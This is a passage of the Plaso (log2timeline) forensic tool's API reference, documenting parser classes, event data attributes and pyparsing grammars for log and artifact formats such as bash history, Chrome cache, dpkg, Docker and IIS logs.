W:(0123...)} Suppress:(":")} W:(0123...)})} {lineEnd}...})] MAX_LINE_LENGTH = 65536 NAME = 'apt_history' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a log entry. Raises ParseError – when the structure type is unknown.

5.1. Subpackages 355 Plaso (log2timeline), Release 20210606

VerifyStructure(parser_mediator, line) Verify that this file is an APT History log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – single line from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.asl module

The Apple System Log (ASL) file parser. class plaso.parsers.asl.ASLEventData Bases: plaso.containers.events.EventData Apple System Log (ASL) event data. computer_name name of the host. Type str extra_information extra fields associated to the event. Type str facility facility. Type str group_id group identifier (GID). Type int level level of criticality of the event. Type str message_id message identifier. Type int message message of the event. Type str pid process identifier (PID). Type int read_uid user identifier that can read this file, where -1 represents all.

356 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int read_gid the group identifier that can read this file, where -1 represents all. Type int record_position position of the event record. Type int sender sender or process that created the event. Type str user_sid user identifier (UID). Type str DATA_TYPE = 'mac:asl:event' class plaso.parsers.asl.ASLFileEventData Bases: plaso.containers.events.EventData Apple System Log (ASL) file event data. format_version ASL file format version. Type int is_dirty True if the last log entry offset does not match value in file header and the file is considered dirty. Type bool DATA_TYPE = 'mac:asl:file' class plaso.parsers.asl.ASLParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Apple System Log (ASL) files. DATA_FORMAT = 'Apple System Log (ASL) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'asl_log' ParseFileObject(parser_mediator, file_object) Parses an ASL file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object.

5.1. Subpackages 357 Plaso (log2timeline), Release 20210606

Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.bash_history module

Parser for bash history files. class plaso.parsers.bash_history.BashHistoryEventData Bases: plaso.containers.events.EventData Bash history log event data. command command that was executed. Type str DATA_TYPE = 'bash:history:command' class plaso.parsers.bash_history.BashHistoryParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parses events from Bash history files. DATA_FORMAT = 'Bash history file' LINE_STRUCTURES = [('log_entry', {{{Suppress:("#") W:(0123...)} Re:('.*?(?=($|\\n#\\d{10}))')} lineEnd})] NAME = 'bash_history' ParseRecord(parser_mediator, key, structure) Parses a record and produces a Bash history event. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – elements parsed from the file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verifies that this is a bash history file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool

358 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.bencode_parser module

Parser for bencoded files. class plaso.parsers.bencode_parser.BencodeFile Bases: object Bencode file. decoded_values decoded values. Type collections.OrderedDict[bytes|str, object]] Close() Closes the file. GetDecodedValue(name) Retrieves a decoded value. Parameters name (str) – name of the value. Returns decoded value or None if not available. Return type object GetDecodedValues() Retrieves the decoded values. Yields tuple[str, object] – name and decoded value. Open(file_object) Opens a bencode file. Parameters file_object (dfvfs.FileIO) – file-like object. Raises • IOError – if the file-like object cannot be read. • OSError – if the file-like object cannot be read. • ValueError – if the file-like object is missing. property keys names of all the keys. Type set[str] class plaso.parsers.bencode_parser.BencodeParser Bases: plaso.parsers.interface.FileObjectParser Parser for bencoded files. DATA_FORMAT = 'Bencoded file' NAME = 'bencode' ParseFileObject(parser_mediator, file_object) Parses a bencoded file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object.

5.1. Subpackages 359 Plaso (log2timeline), Release 20210606

Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.bencode_parser.BencodeValues(decoded_values) Bases: object Bencode values. GetDecodedValue(name) Retrieves a decoded value. Parameters name (str) – name of the value. Returns decoded value or None if not available. Return type object plaso.parsers.bsm module

Basic Security Module (BSM) event auditing file parser. class plaso.parsers.bsm.BSMEventData Bases: plaso.containers.events.EventData Basic Security Module (BSM) audit event data. event_type identifier that represents the type of the event. Type int extra_tokens event extra tokens, which is a list of dictionaries that contain: {token type: {token values}} Type list[dict[str, dict[str, str]]] offset offset of the BSM record relative to the start of the file, from which the event data wasextracted. Type int record_length record length in bytes (trailer number). Type int return_value processed return value and exit status. Type str DATA_TYPE = 'bsm:event' class plaso.parsers.bsm.BSMParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for Basic Security Module (BSM) event auditing files. DATA_FORMAT = 'Basic Security Module (BSM) event auditing file' NAME = 'bsm_log' ParseFileObject(parser_mediator, file_object) Parses a BSM file-like object. Parameters

360 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.chrome_cache module

Parser for Google Chrome and Chromium Cache files. class plaso.parsers.chrome_cache.CacheAddress(cache_address) Bases: object Chrome cache address. block_number block data file number. Type int block_offset offset within the block data file. Type int block_size block size. Type int filename name of the block data file. Type str value cache address. Type int FILE_TYPE_BLOCK_1024 = 3 FILE_TYPE_BLOCK_256 = 2 FILE_TYPE_BLOCK_4096 = 4 FILE_TYPE_BLOCK_RANKINGS = 1 FILE_TYPE_SEPARATE = 0 class plaso.parsers.chrome_cache.CacheEntry Bases: object Chrome cache entry. creation_time creation time, in number of microseconds since since January 1, 1601, 00:00:00 UTC. Type int hash super fast hash of the key. Type int

5.1. Subpackages 361 Plaso (log2timeline), Release 20210606

key key. Type bytes next cache address of the next cache entry. Type int original_url original URL derived from the key. Type str rankings_node cache address of the rankings node. Type int class plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Chrome cache data block file parser. ParseCacheEntry(file_object, block_offset) Parses a cache entry. Parameters • file_object (dfvfs.FileIO) – a file-like object to read from. • block_offset (int) – block offset of the cache entry. Returns cache entry. Return type CacheEntry Raises ParseError – if the cache entry cannot be read. ParseFileObject(parser_mediator, file_object) Parses a file-like object. Parameters • parser_mediator (ParserMediator) – a parser mediator. • file_object (dfvfs.FileIO) – a file-like object to parse. Raises ParseError – when the file cannot be parsed. class plaso.parsers.chrome_cache.ChromeCacheEntryEventData Bases: plaso.containers.events.EventData Chrome Cache event data. original_url original URL. Type str DATA_TYPE = 'chrome:cache:entry' class plaso.parsers.chrome_cache.ChromeCacheIndexFileParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper

362 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Chrome cache index file parser. creation_time creation time, in number of number of microseconds since January 1, 1601, 00:00:00 UTC. Type int index_table the cache addresses which are stored in the index file. Type list[CacheAddress] ParseFileObject(parser_mediator, file_object) Parses a file-like object. Parameters • parser_mediator (ParserMediator) – a parser mediator. • file_object (dfvfs.FileIO) – a file-like object to parse. Raises ParseError – when the file cannot be parsed. class plaso.parsers.chrome_cache.ChromeCacheParser Bases: plaso.parsers.interface.FileEntryParser Parses Chrome Cache files. DATA_FORMAT = 'Google Chrome or Chromium Cache file' NAME = 'chrome_cache' ParseFileEntry(parser_mediator, file_entry) Parses Chrome Cache files. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_entry (dfvfs.FileEntry) – file entry. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.chrome_preferences module

A parser for the Chrome preferences file. class plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData Bases: plaso.containers.events.EventData Chrome content settings exceptions event data. permission permission. Type str primary_url primary URL. Type str secondary_url secondary URL.

5.1. Subpackages 363 Plaso (log2timeline), Release 20210606

Type str DATA_TYPE = 'chrome:preferences:content_settings:exceptions' class plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData Bases: plaso.containers.events.EventData Chrome Extension event data. extension_id extension identifier. Type str extension_name extension name. Type str path path. Type str DATA_TYPE = 'chrome:preferences:extension_installation' class plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventData Bases: plaso.containers.events.EventData Chrome Extension Autoupdater event data. message message. Type str DATA_TYPE = 'chrome:preferences:extensions_autoupdater' class plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventData Bases: plaso.containers.events.EventData Chrome history clearing event data. message message. Type str DATA_TYPE = 'chrome:preferences:clear_history' class plaso.parsers.chrome_preferences.ChromePreferencesParser Bases: plaso.parsers.interface.FileObjectParser Parses Chrome Preferences files. DATA_FORMAT = 'Google Chrome Preferences file' NAME = 'chrome_preferences' ParseFileObject(parser_mediator, file_object) Parses a Chrome preferences file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object.

364 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Raises UnableToParseFile – when the file cannot be parsed. REQUIRED_KEYS = frozenset({'browser', 'extensions'}) plaso.parsers.cups_ipp module

The CUPS IPP files parser. CUPS IPP version 1.0: * https://tools.ietf.org/html/rfc2565* https://tools.ietf.org/html/rfc2566* https://tools.ietf. org/html/rfc2567* https://tools.ietf.org/html/rfc2568* https://tools.ietf.org/html/rfc2569* https://tools.ietf.org/html/ rfc2639 CUPS IPP version 1.1: * https://tools.ietf.org/html/rfc2910* https://tools.ietf.org/html/rfc2911* https://tools.ietf.org/ html/rfc3196* https://tools.ietf.org/html/rfc3510 CUPS IPP version 2.0: * N/A class plaso.parsers.cups_ipp.CupsIppEventData Bases: plaso.containers.events.EventData CUPS IPP event data. application application that prints the document. Type str computer_name name of the computer. Type str copies number of copies. Type int doc_type type of document. Type str job_id job identifier. Type str job_name job name. Type str owner real name of the user. Type str printer_id identification name of the print. Type str uri URL of the CUPS service.

5.1. Subpackages 365 Plaso (log2timeline), Release 20210606

Type str user system user name. Type str DATA_TYPE = 'cups:ipp:event' class plaso.parsers.cups_ipp.CupsIppParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for CUPS IPP files. DATA_FORMAT = 'CUPS IPP file' NAME = 'cups_ipp' ParseFileObject(parser_mediator, file_object) Parses a CUPS IPP file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.custom_destinations module

Parser for custom destinations jump list (.customDestinations-ms) files. class plaso.parsers.custom_destinations.CustomDestinationsParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses custom destinations jump list (.customDestinations-ms) files. DATA_FORMAT = 'Custom destinations jump list (.customDestinations-ms) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'custom_destinations' ParseFileObject(parser_mediator, file_object) Parses a .customDestinations-ms file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed.

366 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.parsers.czip module

This file contains a parser for compound ZIP files. class plaso.parsers.czip.CompoundZIPParser Bases: plaso.parsers.interface.FileObjectParser Shared functionality for parsing compound ZIP files. Compound ZIP files are ZIP files used as containers to create another file format, as opposed toarchivesof unrelated files. DATA_FORMAT = 'Compound ZIP file' NAME = 'czip' ParseFileObject(parser_mediator, file_object) Parses a compound ZIP file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.docker module

Parser for Docker configuration and log files. class plaso.parsers.docker.DockerJSONContainerEventData Bases: plaso.containers.events.EventData Docker container configuration event data. action whether the container was created, started, or finished. Type str container_id identifier of the container (SHA256). Type str container_name name of the container. Type str DATA_TYPE = 'docker:json:container' class plaso.parsers.docker.DockerJSONContainerLogEventData Bases: plaso.containers.events.EventData Docker container’s log event data. container_id identifier of the container (sha256). Type str

5.1. Subpackages 367 Plaso (log2timeline), Release 20210606

log_line log line. Type str log_source log source. Type str DATA_TYPE = 'docker:json:container:log' class plaso.parsers.docker.DockerJSONLayerEventData Bases: plaso.containers.events.EventData Docker file system layer configuration event data. command the command used which made Docker create a new layer. layer_id the identifier of the current Docker layer (SHA-1). DATA_TYPE = 'docker:json:layer' class plaso.parsers.docker.DockerJSONParser Bases: plaso.parsers.interface.FileObjectParser Parser for Docker json configuration and log files. This handles : * Per container config file DOCKER_DIR/containers//config.json

• Per container stdout/stderr output log DOCKER_DIR/containers//-json.log • Filesystem layer config files DOCKER_DIR/graph//json

DATA_FORMAT = 'Docker configuration and log JSON file' NAME = 'dockerjson' ParseFileObject(parser_mediator, file_object) Parses various Docker configuration and log files in JSON format. This methods checks whether the file_object points to a docker JSON config or log file, and callsthe corresponding _Parse* function to generate Events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises • UnableToParseFile – when the file cannot be parsed. • ValueError – if the JSON file cannot be decoded.

368 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.dpkg module

Parser for Debian package manager log (dpkg.log) files. Information updated 02 September 2016. An example: 2016-08-03 15:25:53 install base-passwd:amd64 3.5.33 Log messages are of the form: YYYY-MM-DD HH:MM:SS startup type command Where type is: archives (with a command of unpack or install) packages (with a command of configure, triggers-only, remove or purge) YYYY-MM-DD HH:MM:SS status state pkg installed-version YYYY-MM-DD HH:MM:SS action pkg installed-version available-version Where action is: install, upgrade, configure, trigproc, disappear, remove or purge. YYYY-MM-DD HH:MM:SS conffile filename decision Where decision is install orkeep. class plaso.parsers.dpkg.DpkgEventData Bases: plaso.containers.events.EventData Dpkg event data. body body of the log line. Type str DATA_TYPE = 'dpkg:line' class plaso.parsers.dpkg.DpkgParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parser for Debian package manager log (dpkg.log) files. DATA_FORMAT = 'Debian package manager log (dpkg.log) file' LINE_STRUCTURES = [('line', {Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {Combine:({{"startup" archives | packages} unpack | install | configure | triggers-only | remove | purge}) | Combine:({{{"status" W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{{install | upgrade | configure | trigproc | disappear | remove | purge W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{"conffile" W:(0123...)} install | keep})}})] NAME = 'dpkg' ParseRecord(parser_mediator, key, structure) Parses a structure of tokens derived from a line of a text file. Parameters • parser_mediator (ParserMediator) – parser mediator. • key (str) – identifier of the structure of tokens. • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown.

5.1. Subpackages 369 Plaso (log2timeline), Release 20210606

VerifyStructure(parser_mediator, line) Verifies if a line from a text file is in the expected format. Parameters • parser_mediator (ParserMediator) – parser mediator. • line (str) – line from a text file. Returns True if the line is in the expected format, False if not. Return type bool plaso.parsers.dsv_parser module

Delimiter separated values (DSV) parser interface. class plaso.parsers.dsv_parser.DSVParser Bases: plaso.parsers.interface.FileObjectParser Delimiter separated values (DSV) parser interface. COLUMNS = [] DELIMITER = ',' ESCAPE_CHARACTER = '' FIELD_SIZE_LIMIT = 131072 classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NUMBER_OF_HEADER_LINES = 0 ParseFileObject(parser_mediator, file_object) Parses a DSV text file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed. abstract ParseRow(parser_mediator, row_offset, row) Parses a line of the log file and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row_offset (int) – offset of the line from which the row was extracted. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. QUOTE_CHAR = '"' abstract VerifyRow(parser_mediator, row) Verifies if a line of the file is in the expected format.

370 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • row (dict[str, str]) – fields of a single row, as specified in COLUMNS. Returns True if this is the correct parser, False otherwise. Return type bool

plaso.parsers.esedb module

Parser for Extensible Storage Engine (ESE) database files (EDB). class plaso.parsers.esedb.ESEDBCache Bases: plaso.parsers.plugins.BasePluginCache A cache storing query results for ESEDB plugins. StoreDictInCache(attribute_name, dict_object) Store a dict object in cache. Parameters • attribute_name (str) – name of the attribute. • dict_object (dict) – dictionary. class plaso.parsers.esedb.ESEDBParser Bases: plaso.parsers.interface.FileObjectParser Parses Extensible Storage Engine (ESE) database files (EDB). DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'esedb' ParseFileObject(parser_mediator, file_object) Parses an ESE database file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. class plaso.parsers.esedb.ESEDatabase Bases: object Extensible Storage Engine (ESE) database. Close() Closes the database. GetTableByName(name) Retrieves a table by its name.

5.1. Subpackages 371 Plaso (log2timeline), Release 20210606

Parameters name (str) – name of the table. Returns the table with the corresponding name or None if there is no table with the name. Return type pyesedb.table Open(file_object) Opens an Extensible Storage Engine (ESE) database file. Parameters file_object (dfvfs.FileIO) – file-like object. Raises • IOError – if the file-like object cannot be read. • OSError – if the file-like object cannot be read. • ValueError – if the file-like object is missing. property tables names of all the tables. Type list[str] plaso.parsers.filestat module

File system stat object parser. class plaso.parsers.filestat.FileStatEventData Bases: plaso.containers.events.EventData File system stat event data. display_name display name. Type str file_entry_type dfVFS file entry type. Type int file_size file size in bytes. Type int file_system_type file system type. Type str filename name of the file. Type str inode inode of the file. Type int

372 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

is_allocated True if the file is allocated. Type bool DATA_TYPE = 'fs:stat' class plaso.parsers.filestat.FileStatParser Bases: plaso.parsers.interface.FileEntryParser Parses file system stat object. DATA_FORMAT = 'file system stat information' NAME = 'filestat' ParseFileEntry(parser_mediator, file_entry) Parses a file entry. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_entry (dfvfs.FileEntry) – a file entry. plaso.parsers.firefox_cache module

Implements a parser for Firefox cache 1 and 2 files. class plaso.parsers.firefox_cache.BaseFirefoxCacheParser Bases: plaso.parsers.interface.FileObjectParser Parses Firefox cache files. class plaso.parsers.firefox_cache.FirefoxCache2Parser Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses Firefox cache version 2 files (Firefox 32 or later). DATA_FORMAT = 'Mozilla Firefox Cache version 2 file (version 32 or later)' NAME = 'firefox_cache2' ParseFileObject(parser_mediator, file_object) Parses a Firefox cache file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. class plaso.parsers.firefox_cache.FirefoxCacheEventData Bases: plaso.containers.events.EventData Firefox cache event data. data_size size of the cached data. Type int

5.1. Subpackages 373 Plaso (log2timeline), Release 20210606

fetch_count number of times the cache entry was fetched. Type int frequency ??? Type int info_size size of the metadata. Type int location ??? Type str request_method HTTP request method. Type str request_size HTTP request byte size. Type int response_code HTTP response code. Type int url URL of original content. Type str version cache format version. Type int DATA_TYPE = 'firefox:cache:record' class plaso.parsers.firefox_cache.FirefoxCacheParser Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser, plaso.lib.dtfabric_helper. DtFabricHelper Parses Firefox cache version 1 files (Firefox 31 or earlier). DATA_FORMAT = 'Mozilla Firefox Cache version 1 file (version 31 or earlier)' FIREFOX_CACHE_CONFIG alias of plaso.parsers.firefox_cache.firefox_cache_config NAME = 'firefox_cache' ParseFileObject(parser_mediator, file_object) Parses a Firefox cache file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

374 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the file cannot be parsed. plaso.parsers.fseventsd module

Parsers for MacOS fseventsd files. class plaso.parsers.fseventsd.FseventsdEventData Bases: plaso.containers.events.EventData MacOS file system event (fseventsd) event data event_identifier the record event identifier. Type int flags flags stored in the record. Type int node_identifier file system node identifier related to the file system event. Type int path path recorded in the fseventsd record. Type str DATA_TYPE = 'macos:fseventsd:record' class plaso.parsers.fseventsd.FseventsdParser Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper. DtFabricHelper Parser for fseventsd files. This parser supports both version 1 and version 2 fseventsd files. Refer to http://nicoleibrahim.com/ apple-fsevents-forensics/ for details. DATA_FORMAT = 'MacOS File System Events Disk Log Stream (fseventsd) file' classmethod GetFormatSpecification() Retrieves the format specification. Returns format specification. Return type FormatSpecification NAME = 'fseventsd' ParseFileObject(parser_mediator, file_object) Parses an fseventsd file. Parameters • parser_mediator (ParserMediator) – parser mediator. • file_object (dfvfs.FileIO) – a file-like object. Raises UnableToParseFile – when the header cannot be parsed.

5.1. Subpackages 375 Plaso (log2timeline), Release 20210606 plaso.parsers.gdrive_synclog module

Parser for Google Drive Sync log files. class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData Bases: plaso.containers.events.EventData Google Drive Sync log event data. log_level logging level of event such as “DEBUG”, “WARN”, “INFO”, “ERROR”. Type str message log message. Type str pid process identifier of process which logged event. Type int source_code filename:line_number of source file which logged event. Type str thread colon-separated thread identifier in the form “ID:name” which logged event. Type str DATA_TYPE = 'gdrive_sync:log:line' class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parses events from Google Drive Sync log files. BUFFER_SIZE = 16384 DATA_FORMAT = 'Google Drive Sync log file' LINE_STRUCTURES = [('logline', {{{{{{Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)}) W:(ABCD...)} W:(0123...)} W:(0123...)} W:(0123...)} SkipTo:({StringEnd | Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)})})} [lineEnd]...})] NAME = 'gdrive_synclog' ParseRecord(parser_mediator, key, structure) Parses a log record structure and produces events. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – identifier of the structure of tokens.

376 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verify that this file is a Google Drive Sync log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.google_logging module

Parser for Google-formatted log files. class plaso.parsers.google_logging.GoogleLogEventData(data_type='googlelog:log') Bases: plaso.containers.events.EventData Google-formatted log file event data. See: https://github.com/google/glog. This format is also used by Kubernetes, see https://github.com/kubernetes/ klog file_name the name of the source file that logged the message. Type str line_number the line number in the source file where the logging statement is. Type int message the log message. Type str priority the priority of the message - I, W, E or F. These values represent messages logged at INFO, WARNING, ERROR or FATAL severities, respectively. Type str thread_identifier the identifier of the thread that recorded the message. Type int DATA_TYPE = 'googlelog:log' class plaso.parsers.google_logging.GoogleLogParser Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser Parser for Google-formatted log files. DATA_FORMAT = 'Google-formatted log file'

5.1. Subpackages 377 Plaso (log2timeline), Release 20210606

LINE_STRUCTURES = [('log_entry', {{{{{{{{I | W | E | F {{{{{{{W:(0123...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]}} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("] ")} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd}), ('greeting_start', "Log file created at: "), ('greeting', {{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd})] NAME = 'googlelog' ParseRecord(parser_mediator, key, structure) Parses a matching entry. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – elements parsed from the file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, lines) Verifies that this is a google log-formatted file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • lines (str) – one or more lines from the text file. Returns True if this is the correct parser, False otherwise. Return type bool plaso.parsers.iis module

Parser for Windows IIS Log file. More documentation on fields can be found here: https://msdn.microsoft.com/en-us/library/ms525807(v=vs.90).aspx class plaso.parsers.iis.IISEventData Bases: plaso.containers.events.EventData IIS log event data. cs_cookie Content of a sent or received cookie. Type str cs_host HTTP host header name. Type str cs_referrer Site that referred to the requested site. Type str

378 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

cs_uri_query URI query that was requested. Type str cs_username Username of the authenticated user that accessed the server, where anonymous users are indicated by a hyphen. Type str dest_ip IP address of the server that generated the logged activity. Type str dest_port Server port number. Type str http_method HTTP request method, such as GET or POST. Type str http_status HTTP status code that was returned by the server. Type str protocol_version HTTP protocol version that was used. Type str received_bytes Number of bytes received and processed by the server. Type str requested_uri_stem File requested, such as index.php or Default.htm Type str s_computername Name of the server that generated the logged activity. Type str sc_substatus HTTP substatus error code that was returned by the server. Type str sc_win32_status Windows status code of the server. Type str sent_bytes Number of bytes sent by the server. Type str

5.1. Subpackages 379 Plaso (log2timeline), Release 20210606

source_ip IP address of the client that made the request. Type str s_sitename Service name and instance number that was running on the client. Type str time_taken Time taken, in milliseconds, to process the request. Type str user_agent User agent that was used. Type str DATA_TYPE = 'iis:log:line' class plaso.parsers.iis.WinIISParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses a Microsoft IIS log file. BLANK = "-" COMMENT = {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}} DATA_FORMAT = 'Microsoft IIS log file' DATE_METADATA = {"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} DATE_TIME = {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} FIELDS_METADATA = {"Fields:" SkipTo:(LineEnd)} INTEGER = {W:(0123...) | "-"} IP_ADDRESS = {{IPv4 address | IPv6 address} | "-"} LINE_STRUCTURES = [('comment', {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}), ('logline', {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}})]

380 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

